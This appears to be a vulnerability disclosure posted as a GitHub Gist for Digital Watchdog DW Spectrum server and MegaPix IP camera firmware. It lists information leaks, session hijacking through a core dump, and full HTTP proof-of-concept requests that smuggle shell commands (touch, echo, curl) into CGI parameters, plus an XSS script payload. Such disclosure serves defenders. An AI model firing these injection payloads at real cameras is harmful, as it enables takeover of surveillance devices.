-
-
Save secgrant/820faeeaa0cb4889edaa1d6fef83deab to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
The following issue was found on DW Spectrum server software ver 4.2.0.32842 | |
Information Disclosure: | |
1. API call displays internal paths, IPs, OS version and architecture. | |
http://<SERVER IP>:7001/api/moduleInformation | |
All issues below were found on A7.2.2_20211029 firmware of MegaPix IP Camera by Digital Watchdog. | |
The following issues were found through unauthenticated URLs: | |
Information Disclosure: | |
1. Web files display internal paths and scripts, software versions (CWE-201) | |
http://192.168.1.80/plugin_info_list.xml | |
http://192.168.1.80/plugin/plugin_web.conf | |
http://192.168.1.80/plugin/port.conf | |
2. Information disclosure and session hijacking through core log (CWE-201) | |
Step 1. generate 500 error from authenticated by going to 192.168.1.80/cgi-bin/result?msubmenu=event&action | |
Step 2. get core file by going to 192.168.1.80/cgi-bin/core | |
Step 3. Use session token information from error event to log into admin pages | |
The following issues were found through authenticated URLs: | |
1. Command injection on curltest.cgi web file | |
http://192.168.1.80/cgi-bin/admin/curltest.cgi | |
-injectable on test[] parameters smtp_addr,smtp_port,sender,receiver,id, and pass | |
POST /cgi-bin/admin/curltest.cgi?smtp HTTP/1.1 | |
Host: 192.168.1.80 | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 | |
Accept: */* | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate | |
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | |
X-Requested-With: XMLHttpRequest | |
Content-Length: 299 | |
Origin: http://192.168.1.80 | |
Authorization: Digest username="admin", realm="IP Camera", nonce="5fdb55be:74a954dee4e18d4598f921815cfda122", uri="/cgi-bin/admin/curltest.cgi?smtp", response="36f619b490b3f5b6cc381f3c80249f2c", qop=auth, nc=0000007d, cnonce="c0b5e7ad8a3ce8b7" | |
Connection: close | |
Referer: http://192.168.1.80/cgi-bin/admin/setup_main.cgi | |
test%5Benabled%5D=1&test%5Bsmtp_addr%5D=192.168.1.5:444';touch%20./test.txt;curl%20--url%20'http://192.168.1.5&test%5Bssl_enable%5D=0&test%5Bsmtp_port%5D=444&test%5Bssl_port%5D=465&test%5Bid%5D=a&test%5Bpass%5D=a&test%5Bsender%5D=test&test%5Breceiver%5D=test&test%5Btitle%5D=hi&test%5Bmessage%5D=hi | |
2. Command injection on adacph.cgi web file (CWE-94) | |
http://192.168.1.80/cgi-bin/admin/vca/bia/addacph.cgi | |
-injectable on event, id, pluginname, name, and evt_id paramaters | |
GET /cgi-bin/admin/vca/bia/addacph.cgi?mod&event=a&id=1&pluginname=;%20echo%20'test'>test.html%20;&name=a&evt_id=a | |
3. Command injection on license_tok.cgi web file (CWE-94) | |
http://192.168.1.80/cgi-bin/admin/vca/license/license_tok.cgi | |
-injectable on POST guid,license_value, and plugin_info parameters | |
POST /cgi-bin/admin/vca/license/license_tok.cgi?getToken HTTP/1.1 | |
Host: 192.168.1.80 | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 | |
Accept: */* | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate | |
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | |
X-Requested-With: XMLHttpRequest | |
Content-Length: 96 | |
Origin: http://192.168.1.80 | |
Authorization: Digest username="admin", realm="IP Camera", nonce="5fe1c519:e61374f2ea956e03c278894d036fc0ef", uri="/cgi-bin/admin/curltest.cgi?smtp", response="53219d6b6a8afdffb3fbbfd9a17dcf98", qop=auth, nc=0000068c, cnonce="960aed74a9bd1476" | |
Connection: close | |
Referer: http://192.168.1.80/cgi-bin/admin/setup_main.cgi | |
guid='555 http://127.0.0.1;%20echo 'test'>test.html%20;curl -k -d guid=555'&license_value='fff' | |
4. XSS vulnerability in bia_oneshot.cgi web file (CWE-79) | |
http://192.168.1.80/cgi-bin/admin/vca/bia/bia_oneshot.cgi?blob=%3Chtml%3E%3Cscript%3Ealert(%27test%27)%3C/script%3E%3C/html%3E | |
-file contents injection allows persistent XSS through blob parameter | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment